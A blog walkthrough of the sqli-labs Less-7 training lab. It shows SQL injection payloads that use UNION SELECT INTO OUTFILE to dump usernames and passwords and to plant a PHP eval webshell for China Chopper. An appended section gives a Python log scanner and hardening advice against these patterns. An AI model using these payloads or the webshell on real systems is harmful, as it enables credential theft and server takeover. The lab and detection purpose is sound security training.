sqli-labs Less-7

Disclaimer: This is an original article by the blogger, released under the CC 4.0 BY-SA license. When reproducing it, please attach the original source link and this statement.
Original link: https://blog.csdn.net/qq_45106794/article/details/102628325

## sqli-labs Less-7

http://localhost/sqli-labs-master/Less-7/?id=1

First, as usual, determine whether the injection point is numeric or string-based.

Testing with "and 1=1" and "and 1=2" shows that it is not numeric.

Next, test with ' and ".

The result: ' produces an error, while " returns the normal page.

This indicates a string-type parameter delimited by '.

But after substituting '--+ the result shows that something is still missing.

Guess by adding ).

We find that '))--+ returns the normal page.

According to the lesson title (Dump into outfile),

this is likely a vulnerability that allows exporting data to a file.

So use '))union select 1,2,3 into outfile "xixi.txt"--+

Even though the page echoes an error,

you can see that the file was written successfully.

Next, we can begin to get the database name and user information.

'))union select 1,2,table_name from information_schema.tables where table_schema='security' into outfile "xixi.txt"--+

'))union select 1,2,column_name from information_schema.columns where table_name='users' into outfile "xixi.txt"--+

'))union select 1,2,username from security.users into outfile "xixi.txt"--+

'))union select 1,2,password from security.users into outfile "xixi.txt"--+

#######

This lesson can also be solved by constructing a one-line webshell (a "one-sentence Trojan").

'))union select 1,2, '<?php eval($_post["reader"])?>' into outfile "xixi.php"--+

'))union select 1,2, '<?php eval($_post[reader])?>' into outfile "D:/phpStudy/PHPTutorial/WWW/sqli-labs-master/less-7/xixi.php"--+

Then connect to it with China Chopper (the "Chinese kitchen knife" tool).
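
A defender's view of the requests above, as an added example that is not part of the original post: a small Python scanner that URL-decodes each query parameter in a web access log and flags the INTO OUTFILE and UNION SELECT patterns this lesson relies on. The log lines are constructed samples, and the function and rule names are illustrative assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for illustration; not taken from the original post.
SAMPLE_LOG = '''\
127.0.0.1 - - [01/Jan/2020:10:00:01 +0000] "GET /sqli-labs-master/Less-7/?id=1 HTTP/1.1" 200 721
127.0.0.1 - - [01/Jan/2020:10:00:09 +0000] "GET /sqli-labs-master/Less-7/?id=1%27))union%20select%201,2,3%20into%20outfile%20%22xixi.txt%22--+ HTTP/1.1" 200 745
127.0.0.1 - - [01/Jan/2020:10:00:15 +0000] "GET /sqli-labs-master/Less-7/?id=1%27))union%20select%201,2,username%20from%20security.users%20into%20outfile%20%22xixi.txt%22--+ HTTP/1.1" 200 745
127.0.0.1 - - [01/Jan/2020:10:00:20 +0000] "GET /search?q=how+to+move+into+outfield HTTP/1.1" 200 512
'''

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
RULES = {
    # File-write clause used by every request in this lesson.
    "file-write": re.compile(r"\binto\s+(?:outfile|dumpfile)\b"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b"),
}

def normalize(value):
    """Lower-case, turn /* */ comments into spaces, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan(log_text):
    """Return (line_number, parameter, matched_rules) for suspicious requests."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes each value and maps '+' to a space.
        for name, value in parse_qsl(query, keep_blank_values=True):
            text = normalize(value)
            tags = sorted(tag for tag, rule in RULES.items() if rule.search(text))
            if tags:
                hits.append((number, name, tags))
    return hits

if __name__ == "__main__":
    for number, name, tags in scan(SAMPLE_LOG):
        print(f"line {number}: parameter {name!r} matched {', '.join(tags)}")
```

On the database side, file writes like these depend on the MySQL account holding the FILE privilege and on the server's secure_file_priv setting, so restricting both removes the primitive that log matching can only report.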
